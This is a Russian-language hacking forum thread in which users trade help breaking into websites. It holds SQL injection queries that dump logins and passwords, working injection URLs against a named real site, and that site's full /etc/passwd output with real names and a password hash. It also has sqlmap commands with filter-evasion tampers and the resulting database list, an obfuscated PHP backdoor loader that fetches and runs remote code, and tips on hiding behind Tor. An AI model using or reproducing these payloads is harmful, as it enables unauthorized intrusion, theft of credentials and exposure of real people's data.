Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    226
    Likes Received:
    105
    Reputations:
    1
    Добрый вечер
    как в таком запросе сделать ограничение на количество выводимых данных?
    Code:
    (select (@x) from (select (@x:=0x00),(select (0) from (user)where (0x00) in (@x:=concat(@x,0x3c62723e,login,0x3a,password))))x)
    
    Когда большая бд, сайт ложится от попытки вывести все содержимое таблицы.
     
    Sensoft likes this.
  2. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    226
    Likes Received:
    105
    Reputations:
    1
    Code:
    (select@ from(select@:=0x00,(select 1 from(select*from user order by userid ASC limit 0,100)w where(@:=concat(@,0x3c62723e,login,0x3a,password))))q)
    
    Сам спросил , сам ответил. Збс
    Может кому пригодится
     
    #2462 karkajoi, 28 Sep 2018
    Last edited: 1 Oct 2018
    man474019 likes this.
  3. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,461
    Likes Received:
    398
    Reputations:
    228
  4. man474019

    man474019 Member

    Joined:
    31 Jul 2015
    Messages:
    241
    Likes Received:
    65
    Reputations:
    1
  5. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,461
    Likes Received:
    398
    Reputations:
    228
    естественно, т.к. такой страницы нет
    Code:
    WHERE (link_oldlinks.url='forschung.htmladsadsa' OR link_oldlinks.url='forschung.htmladsadsa/')
    Смущает только
    Code:
    Table 'crossroads_asia.link_oldlinks' doesn't exist
     
  6. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    444
    Likes Received:
    80
    Reputations:
    20
    Что максимально можно извлечь из инекции в style="тут" разрешено '<>... без " ?
    Code:
    <a href="site.md" target="_blank" style=" ">XSS</a>
     
  7. sepo

    sepo Member

    Joined:
    21 Jan 2017
    Messages:
    47
    Likes Received:
    11
    Reputations:
    11
    Всем привет, нашел уязвимый сайт, но вот беда, ни ручками, ни скульмапом инъекцию раскрутить не могу. Есть тут желающии помочь?
    Code:
    http://www.mscnano.eu/news.php?id=132
     
  8. ms13

    ms13 Level 8

    Joined:
    19 Jun 2015
    Messages:
    2,126
    Likes Received:
    9,187
    Reputations:
    110
    Например так
    Code:
    http://www.mscnano.eu/news.php?id=z%27%20or%20mid(version(),1,1)=5%20and%20%272%27=%272
    а вообще там union based
    Code:
    http://www.mscnano.eu/news.php?id=z%27%20union%20select%201,2,3,@@version,5,6,user(),8--%20-
    ну и тд
    Code:
    http://www.mscnano.eu/news.php?id=z%27%20union%20select%201,2,3,load_file(%27/etc/passwd%27),5,6,7,8--%20-
    root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:103::/home/syslog:/bin/false messagebus:x:102:107::/var/run/dbus:/bin/false avahi-autoipd:x:103:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false avahi:x:104:111:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false couchdb:x:105:113:CouchDB Administrator,,,:/var/lib/couchdb:/bin/bash speech-dispatcher:x:106:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh usbmux:x:107:46:usbmux daemon,,,:/home/usbmux:/bin/false haldaemon:x:108:114:Hardware abstraction layer,,,:/var/run/hald:/bin/false kernoops:x:109:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false pulse:x:110:115:pulseAudio daemon,,,:/var/run/pulse:/bin/false rtkit:x:111:117:RealtimeKit,,,:/proc:/bin/false saned:x:112:118::/home/saned:/bin/false hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false gdm:x:114:120:Gnome Display Manager:/var/lib/gdm:/bin/false txomin:x:1000:1000:txomin,,,:/home/txomin:/bin/bash sshd:x:115:65534::/var/run/sshd:/usr/sbin/nologin dipc:x:504:100:Donostia International Physics Center:/home/dipc:/bin/csh csic:x:505:100:Unidad de Fisica de Materiales:/home/csic:/bin/bash arubio:x:506:100:Angel Rubio:/home/arubio:/bin/bash ortega:x:507:100:Enrique Ortega:/home/ortega:/bin/csh ricardo:x:508:100:Ricardo Diez Muino:/home/ricardo:/bin/bash group:x:509:100:Echenique's Group:/home/group:/bin/csh seminars:x:510:100:Seminars:/home/seminars:/bin/csh papers:x:511:100:papers:/home/papers:/bin/csh jgarcia:x:512:100:F. Javier Garcia de Abajo:/home/jgarcia:/bin/csh Echenique:x:513:100:pedro M. Echenique:/home/Echenique:/bin/csh aizpurua:x:517:517:Javier Aizpurua:/home/aizpurua:/bin/bash scsroast:x:518:100::/home/scsroast:/bin/csh inigo:x:529:100::/home/inigo:/bin/bash otzarreta:x:530:530::/home/otzarreta:/bin/bash gaudoin:x:532:532::/home/gaudoin:/bin/bash nanolab:x:533:533::/home/nanolab:/bin/bash nanotron:x:534:534::/home/nanotron:/bin/bash remi:x:535:535::/home/remi:/bin/bash digitalak:x:536:536::/home/digitalak:/bin/bash nano2006:x:537:537::/home/nano2006:/bin/bash aitzol:x:500:501:Aitzol Garcia Etxarri:/home/aitzol:/bin/bash waparpia:x:501:503:Andres Arnau:/home/waparpia:/bin/tcsh ftpdipc:x:538:538:Cuenta ftp:/home/ftpdipc:/bin/bash dedomulti:x:539:539::/home/dedomulti:/bin/bash eph2007:x:540:540::/home/eph2007:/bin/bash eltonjose:x:502:504:Elton Jose:/home/eltonjose:/bin/bash moodle:x:503:505:Usuario de moodle:/home/moodle:/bin/bash mscnano:x:523:506:Master Nanotecnologia:/home/mscnano:/bin/bash coronado:x:524:507:Alejandro Reyes Coronado:/home/coronado:/bin/bash mscnanointra:x:527:508::/home/mscnano/intranet:/bin/bash ssmeeting:x:543:509:ssmeeting:/home/ssmeeting:/bin/tcsh leskovsky:x:544:544::/home/leskovsky:/bin/bash einstein:x:545:545::/home/einstein:/bin/bash cerveny:x:514:502:Silvina Cerveny:/home/cerveny:/bin/bash schwartz:x:521:510:Gustavo Schwartz:/home/schwartz:/bin/bash frederiksen:x:526:511:Thomas Frederiksen:/home/frederiksen:/bin/bash webalianza:x:528:512::/home/webalianza:/bin/bash dipc10:x:541:513::/home/dipc10:/bin/bash eugene:x:542:514:Eugene Krasovskii:/home/eugene:/bin/bash metamorp:x:520:520::/home/metamorphose:/bin/bash spans:x:522:522::/home/spans:/bin/bash meeting:x:525:525::/home/meeting:/bin/bash Debian-exim:x:117:124::/var/spool/exim4:/bin/false mysql:x:116:123:MySQL Server,,,:/var/lib/mysql:/bin/false statd:x:118:65534::/var/lib/nfs:/bin/false nfo12:x:546:515:nfo12:/home/nfo12:/bin/bash mestizajes:x:547:516:Congreso Mestizajes:/home/mestizajes:/bin/bash ivo:x:548:519:Ivo Souza:/home/ivo:/bin/bash smmta:x:119:125:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false smmsp:x:120:126:Mail Submission Program,,,:/var/lib/sendmail:/bin/false ossec:x:1001:1001::/var/ossec:/bin/false gosalvez:x:1002:1002::/home/gosalvez:/bin/bash nanophotonics:x:1003:1003:Grupo Javi Aizpurua,,,:/home/nanophotonics:/bin/bash garcialekue:x:1004:1004:Arantzazu Garcia Lekue,,,:/home/garcialekue:/bin/bash rakovich:x:1005:1005:Yury Rakovich:/home/rakovich:/bin/bash mesoscopics:x:1006:1006:Sebastian Bergeret,,,:/home/csic/mesoscopics:/bin/bash mblanco:x:1007:1007::/home/mblanco:/bin/bash QMC:$6$AuxQZxPT$aO5/vg51vWluEfCSmZGogvkptiH3SSqMqvj0SBKu0mq0gNg/Fx4ALtpV4zkn5k5Ne8HcqmEmNZNrjC3RoxTNT/:1008:1008::/home/QMC:/bin/sh iisc21:x:1009:1009:Congreso iisc21,,,:/home/iisc21:/bin/bash TJC:x:1010:1010:Dario Bercioux:/home/TJC:/bin/bash giedke:x:1011:1011:Geza Giedke:/home/giedke:/bin/bash maiagv:x:1012:1012:Maia Garcia Vergniory:/home/maiagv:/bin/bash trmme:x:1013:1013:Congreso Thomas Frederiksen:/home/trmme:/bin/bash internships:x:1014:1014:Responsable Thomas Frederiksen:/home/internships:/bin/bash fbarroso:x:1015:1015:Fabienne Barroso:/home/fbarroso:/bin/bash lsalassa:x:1016:1016:Luca Salassa:/home/lsalassa:/bin/bash tms17:x:1017:1017:Congreso tms17:/home/tms17:/bin/bash ecscd13:x:1018:1018:Confreso ecscd13:/home/ecscd13:/bin/bash magnon:x:1019:1019:Congreso magnon:/home/magnon:/bin/bash mole:x:1020:1020:Grupo Juanjo Saenz:/home/mole:/bin/bash nanoelectronics:x:1021:1021:Grupo Thomas Frederiksen:/home/nanoelectronics:/bin/bash nicolas:x:1022:1022::/home/dipc-courses:/bin/bash bondslam:x:1023:1023:Eduard Matito:/home/bondslam:/bin/bash colloquium:x:1024:1024:Web colloquium:/home/colloquium:/bin/bash tms:x:1025:1025:Congreso tms:/home/tms:/bin/bash qdp2018:x:1026:1026::/home/qdp2018:/bin/bash quantumdev:x:1027:1027::/home/quantumdev:/bin/bash daqm:x:1028:1028::/home/daqm:/bin/bash

    ну шелл сами зальете))
     
    #2468 ms13, 6 Oct 2018
    Last edited: 6 Oct 2018
    lukeone and Pirnazar like this.
  9. lukeone

    lukeone Member

    Joined:
    7 May 2017
    Messages:
    6
    Likes Received:
    17
    Reputations:
    1
    Code:
    python sqlmap.py -u "http://www.mscnano.eu/news.php?id=" --random-agent --hex --threads 1 --dbs --batch --dbms=mysql --technique=U --level 5 --risk 3 --tamper=space2comment,unmagicquotes,escapequotes,versionedkeywords
    
    ---
    Parameter: id (GET)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: id=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178627871,0x775a5551695146647647515859656e61626e6367654643487767764f4e56695a726557454457534a,0x71626b6271),NULL#
    ---

    available databases [64]:
    [*] #mysql50#mysql.old.copia
    [*] 2dspm
    [*] 3s19
    [*] bondslam
    [*] cc
    [*] cees
    [*] cen2018
    [*] computing_resources
    [*] daqm
    [*] dipc
    [*] dipc-courses
    [*] dipc10
    [*] dynapeutics
    [*] e2epol
    [*] eezz18
    [*] etsf
    [*] iegr
    [*] ii
    [*] inelastica
    [*] information_schema
    [*] interfaces2014
    [*] lankor_topa14
    [*] leskovsky
    [*] limage2018
    [*] magnon
    [*] modsurf
    [*] mysql
    [*] n2d
    [*] nanoqi
    [*] nanoqi16
    [*] nanoqi17
    [*] ngsces2018
    [*] oss
    [*] oss18
    [*] pecas
    [*] pecas2019
    [*] pedro
    [*] phpmyadmin
    [*] polymorphs
    [*] prueba
    [*] qdp2018
    [*] quantumchemphys
    [*] quantumdev
    [*] sabat2018
    [*] scom16
    [*] siqew2019
    [*] sos2
    [*] sos22
    [*] test
    [*] theobio17
    [*] tms17
    [*] tmspin
    [*] topadipc
    [*] topadipc2012
    [*] topadipc2014
    [*] topadipc2015
    [*] topadipc2017
    [*] topadipc2018
    [*] topadipcOLD
    [*] topostates
    [*] totalenergy2020
    [*] tstutorial
    [*] webcc
    [*] wikidb

    Вся суть в том, что там стоит какой то фильтр, который сбрасывает соединения при "подозрительных запросах", тамперы в sqlmap помогают всё равно)
     
    Pirnazar and Sola666 like this.
  10. jakonda1001

    jakonda1001 Member

    Joined:
    17 Mar 2016
    Messages:
    178
    Likes Received:
    5
    Reputations:
    0
    как залиться через это
    1. <?php
    2. @ini_set('display_errors', '0');
    3. error_reporting(0);
    4. if (!$npDcheckClassBgp) {
    5. $ea = '_shaesx_'; $ay = 'get_data_ya'; $ae = 'decode'; $ea = str_replace('_sha', 'bas', $ea); $ao = 'wp_cd'; $ee = $ea.$ae; $oa = str_replace('sx', '64', $ee); $algo = 'default'; $pass = "Zgc5c4MXrLUocQYT5ZtHJf/cM1fWdrpdmmSLH6uToRkH";
    6. if (ini_get('allow_url_fopen')) {
    7. function get_data_ya($url) {
    8. $data = file_get_contents($url);
    9. return $data;
    10. }
    11. }
    12. else {
    13. function get_data_ya($url) {
    14. $ch = curl_init();
    15. curl_setopt($ch, CURLOPT_HEADER, 0);
    16. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    17. curl_setopt($ch, CURLOPT_URL, $url);
    18. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8);
    19. $data = curl_exec($ch);
    20. curl_close($ch);
    21. return $data;
    22. }
    23. }
    24. function wp_cd($fd, $fa="")
    25. {
    26. $fe = "wp_frmfunct";
    27. $len = strlen($fd);
    28. $ff = '';
    29. $n = $len>100 ? 8 : 2;
    30. while( strlen($ff)<$len )
    31. {
    32. $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n);
    33. }
    34. return $fd^$ff;
    35. }
    36. $reqw = $ay($ao($oa("$pass"), 'wp_function'));
    37. preg_match('#gogo(.*)enen#is', $reqw, $mtchs);
    38. $dirs = glob("*", GLOB_ONLYDIR);
    39. foreach ($dirs as $dira) {
    40. if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; }
    41. $subdirs = glob("$dira/*", GLOB_ONLYDIR);
    42. foreach ($subdirs as $subdira) {
    43. if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; }
    44. }
    45. }
    46. if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); }
    47. fwrite($hdl, "<?php\n$mtchs[1]\n?>");
    48. fclose($hdl);
    49. include("{$eb}.$algo");
    50. unlink("{$eb}.$algo");
    51. $npDcheckClassBgp = 'aue';
    52. }
     
  11. crlf

    crlf Members of Antichat

    Joined:
    18 Mar 2016
    Messages:
    493
    Likes Received:
    865
    Reputations:
    312
    Он тянет, сохраняет и инклудит вот этот http://linksferma.com/lnk/inj.php скрипт. Там уже понятнее, что к чему.
     
  12. TPAXXTOP

    TPAXXTOP New Member

    Joined:
    12 Oct 2016
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    подскажите друзья есть сайт с гет параметром, добавил в конец ' вышла такая ошибка, думаю есть уязвимость
    You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near and status=1' at line 1
    1064
    но при попытке раскрутить его мапом выдает ошибку unable to connect to the target URL
    пробывал прокси сунуть такая же беда
     
  13. ms13

    ms13 Level 8

    Joined:
    19 Jun 2015
    Messages:
    2,126
    Likes Received:
    9,187
    Reputations:
    110
    TPAXXTOP likes this.
  14. TPAXXTOP

    TPAXXTOP New Member

    Joined:
    12 Oct 2016
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
  15. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    221
    Likes Received:
    372
    Reputations:
    94
    Попробуй для начала раскрутить руками. Потом, когда на руках будет раскрученная уязвимость - используй соответствующие тамперы.
     
    ms13 and TPAXXTOP like this.
  16. TPAXXTOP

    TPAXXTOP New Member

    Joined:
    12 Oct 2016
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    да дело в том что я не умею крутить руками) подскажи как это сделать правильно, или тыкни хоть в какой то мануал пожалуста)
     
  17. ms13

    ms13 Level 8

    Joined:
    19 Jun 2015
    Messages:
    2,126
    Likes Received:
    9,187
    Reputations:
    110
    TPAXXTOP likes this.
  18. ilia455

    ilia455 New Member

    Joined:
    7 Sep 2015
    Messages:
    6
    Likes Received:
    1
    Reputations:
    2
    css injection гугли
     
  19. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    226
    Likes Received:
    105
    Reputations:
    1
    запускай тор , в мапе пропиши --tor или юзай прокси
     
  20. matthhy

    matthhy New Member

    Joined:
    16 Feb 2017
    Messages:
    51
    Likes Received:
    0
    Reputations:
    0
Loading...